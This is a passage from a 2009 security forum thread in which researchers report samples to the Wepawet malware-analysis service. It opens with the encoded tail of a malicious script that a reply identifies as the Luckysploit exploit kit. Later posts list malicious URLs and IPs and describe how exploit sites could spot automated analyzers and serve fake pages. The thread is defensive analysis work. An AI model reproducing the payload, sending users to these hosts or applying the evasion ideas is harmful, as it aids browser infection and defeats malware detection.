KN+NNB+WZO+VVN+VLV+KWW+MGC+OVO+GCK+PKX+KLV+GJZ+TUJ+QFC+KEG+ZTT+VDX+NUU+GQD+YCN+WVV+ZXP+CUJ+OCG+FET+XOO+EQP+SDU+YQB+OPI+KQQ+SVI+ZBP+PEB+TPU+RPZ+FZN+PVI+MXW+TED+FRP+UPM+FHZ+VYM+YZS+UBL+XIL+MNK+FZK+PWN+DNQ+LDY+CRW+RID+POH+CRR+QCF+XSZ+FPZ+RXZ+PWP+ESV+HCU+SMO+NTO+LNM+DLG+IFN+CDD+UXY+ZSJ+FXB+QOD+COR+YWX+CKD+MGI+DGI+YQT+OTU+HXF+MWM+SJQ+TTW+ZEN+KUE+LXL+QGD+EHG+DSY+BPP+JMZ+QNL+HOI+MTQ+ZSZ+ZGR+XQY+GNT+ZTX+GIP+WWF+QVK+OKR+QJQ+YOM+CGS+YQQ+XFQ+CUC+PLG+UXR+GHY+VLI+QBY+QOR+SIH+DIL+TQV+OMY+TWW+IFL+FJL+XDJ+LQK+YUF+LBG+MFR+BOT+SEG+NQS+TBB+RKQ+EVH+VMN+QEM+SGZ+JGH+WZH+BHT+QJH+BZV+QYU+RZH+JMI+JHM+ISQ+JZG+FSL+SGM+FHP+PJF+RLH+TZF+IEX+IPV+ICY+HGE+MZY+JDV+OCN+BSY+VVT+LPQ+QPI+VMY+MXI+ZET+GHU+YSP+OIY+WOS+EZK+MJG+GOS+RLS+SMD+FRL+ZKS+YKK+KTB+DGT+ULN+WGI+RLG+DRO+BGY+PJB+DBV+HON+YBM+GUJ+FOS+FHK+MJE+RFC+FWX+KLN+LYE+TNO+BGG+NQM+YPB+YXH+HSX+DVT+OGH+HNS+ZIY+HOY+IBG+XNR+GOU+KNC+TJK+WDM+LLU+YTO+UUM+IDW+QRV+FXY+HJW+LJZ+TUN+OCX+VKZ+NWQ+NME+KCP+KLT+UTQ+ODG+FDK+NKE+GUD+GGL+HZG+KZL+SCS+FXI+BRJ+BMM+GPB+ULC+KHS+GEY+GQF+NMS+ECB+NML+BLG+WHX+OQZ+UYS+PXK+JDP+EQR+CCK+NPY+WVP+MPF+NWG+UPE+RTP+JGL+IVO+LMF+IUR+JVZ+SGX+UBP+UEH+KSO+YOS+VMW+USP+KUN+POL+JPI+ZBZ+OBE+OVR+IOY+QIG+XUX+DNG+MGN+TOH+CCX+KLK+QYE+GJS+DQC+DHS+NGQ+TWM+YJH+TRT+PWQ+GJY+YZN+GGP+LGZ+CMY+UFJ+VDY+ZPG+XEN+DZX+FNC+SCT+NRU+WEV+GUE+JJJ+NVE+VCY+OBO+CIB+ZVW+YSO+MRJ+BSC+NFD+HBI+CWC+ECS+XPY+HNB+EJN+BPR+BUE+VZW+EXR+VGF+MRR+VZS+ZHR+BLK+FNV+NRY+OQX+VCB+TRM+RFP+LHF+ROL+CHV+XUF+KDV+FVO+NZN+FDU+JYZ+MLW+RRC+MHB+JVD+RQM+QYI+CCJ+BJL+UHB+YDB+JBI+VKG+ZRQ+QXJ+ZSD+BON+VNH+QHF+HMR+WXP+PFL+DTX+MBC+PPI+DOF+UJR+VJE+HSN+XXC+RYD+ZFQ+TXY+LDO+MGH+PLZ+EMR+KSC+REF+IUF+RDX+GLJ+RQY+BXB+KRG+JHV+LZR+UVT+YQO+CXV+NTY+RYS+QXV+FQZ+QQH+MBV+RKO+HJM+DKH+JYU+WQY+GXP+OWG+XCK+MYI+HUM+ETD+SWL+MJP+HFO+CUV+WFO+DWB+QNS+HUH+RRO+BEV+JKD+EXK+DYI+UJP+WIF+DLC+DPX+TSL+DNM+LWH+UPU+XKZ+REW+OXN+NLT+DEI+RUM+QSQ+HKY+LBU+PSS+FDX+GCS+SMW+DPL+WUL+OJZ+KTE+LWE+YCB+DTP+GMP+CBU+VGY+YRM+DIB+LFN+ZTM+CNP+KKB+TPH+NYO+CVK+CMO+QCN+VYE+MTR+ESF+HMY+KME+ING+YUW+RII+UBE+FWV+DHZ+RLZ+SNI+MDY+XIE+QLC+MGZ+CUR+CRB+DBU+ODX+FVZ+EER+OSD+X
CR+WJD+ZEQ+ELW+OUR+PJE+BDN+GLI+BKN+HFZ+WSQ+NKH+VPG+YJB+LOI+YQZ+ZNM+RLI+EYZ+IHR+VWN+GOT+CBH+QHB+TMW+WFX+DXQ+EHN+EZT+NMZ+MHP+NPS+XTN+WKO+OVT+YSH+GSH+FNK+BZZ+BPV+JJV+TKL+GEU+WBM+TTX+HHG+HGM+UIF+RBJ+LTR+XMU+MHV+ZSE+GPY+NYT+IFP+UML+FXV+DVS+CSP+YFN+OUF+SXW+DLZ+XKM+IID+DVR+NHS+LFX+YCZ+ZVQ+HQY+ZLG+SIS+DJZ+QSC+WZZ+BTD+ZSB+SLI+EQS+SCY+RQL+NKQ+MPV+IXP+PPL+BTH+JZD+BCK+SVJ+GZP+OKE+HSE+IPE+ILM+LPR+RCD+WMO+MDT+UPB+WPU+WGQ+RFF+WGF+DQT+DWX+JUY+JZT+POK+UZY+FDN+IRG+KVN+FIL+QLB+ZPF+JFJ+JMH+UYP+HOU+JID+POV+YVC+LHJ+LSO+FUF+TTE+IXQ+FTF+HZZ+UBF+HNZ+GNN+IRJ+LNB+KQJ+JNK+MJW+KBM+OMJ+YVF+MOI+BIO+YXZ+KJX+SUD+UPS+BBD+VIG+VNE+URG+OGB;OJOVLR(VYGLDW);</script></html>
Wepawet is returning "Invalid hostname." and Malzilla can't seem to decode it ........ :(
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 07, 2009, 01:04:43 am
Reply #62

mercutio

MysteryFCM,

The script you posted is decoded here:
http://wepawet.cs.ucsb.edu/view.php?hash=15db7e6dd281669c3f571942c75b3fcb&type=js
The sample is Luckysploit.

Regarding flash, I'll inquire with the "flash guy". I know that some work is under way, but I guess it will take time.


May 07, 2009, 01:26:39 am
Reply #63

MysteryFCM

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 09, 2009, 02:29:18 pm
Reply #64

extrexploit

Hi guys,
Wepawet has a disclosure problem, IMHO.
When an exploit tries to identify the host configuration by probing the ActiveX version, browser version, plug-in versions and so on, Wepawet always sets these values in the same way. This can be useful to a bot admin: because the response is sent back to the web site that supports the exploit, it may be used to understand how to react to automated analysis attempts. For example, if a common PHP stage of a malware-spreading site recognizes that the variables used by the exploit are filled in following a fixed pattern, it can serve a fake page and so cause a wrong analysis result. This is only my point of view.
Feedback is welcome.
I have posted something about it on my blog http://extraexploit.blogspot.com

Regards


May 10, 2009, 06:12:46 pm
Reply #65

SysAdMini

Ruining the bad guy's day

May 10, 2009, 08:16:48 pm
Reply #66

MysteryFCM

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 11, 2009, 03:31:32 am
Reply #67

CkreM

Mal-Aware

May 12, 2009, 02:02:56 am
Reply #68

mercutio

SysAdMini: from here 91.207.61.32/.r/.fi/index.php returns 404 and a benign error message.
The site is of course rather bad: http://wepawet.cs.ucsb.edu/domain.php?hash=6dbd5991176c36df9c0c505c04beba7e&type=js

MysteryFCM: I think the redirection will not be triggered unless the referer is "correct". Unfortunately, wepawet visits the page with an empty referer.

CkreM: yes, I really need to fix that. For now, I've just regenerated the report manually. Real fix coming in the next days, hopefully.

May 12, 2009, 01:32:40 pm
Reply #69

MysteryFCM

Depending on the method you're using, you should be able to set the referer? (or have an option to use one?)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 12, 2009, 03:32:18 pm
Reply #70

SysAdMini

Wepawet is unable to analyze the pdf file at

hugetopnano.cn:8080/cache/readme.pdf
It is not only the URL that fails: if I upload the PDF file directly, the analysis fails too.
Ruining the bad guy's day

May 12, 2009, 06:29:03 pm
Reply #71

B_H

Why can't Wepawet analyze URLs that contain a user name and password? Is that disallowed by policy?! I have seen some URLs that include a user name and password and host malware.

May 12, 2009, 07:36:08 pm
Reply #72

MysteryFCM

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 12, 2009, 08:58:57 pm
Reply #73

mercutio

SysAdMini: yeah, bug. Fixed:
http://wepawet.cs.ucsb.edu/view.php?hash=07ae80f2efd19ef8c6b5b0570cf4ab06&t=1242162153&type=js

B_H: yes, no https, no user/pass. If that becomes too much of a problem, it can be changed.

May 15, 2009, 11:06:03 am
Reply #74

MysteryFCM

Says invalid hostname;

time-for-mumpreneurs.site90.net\images\index.php

Its IP is actually: 64.235.47.65 (srv19.000webhost.com)

http://hosts-file.net/?s=time-for-mumpreneurs.site90.net
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net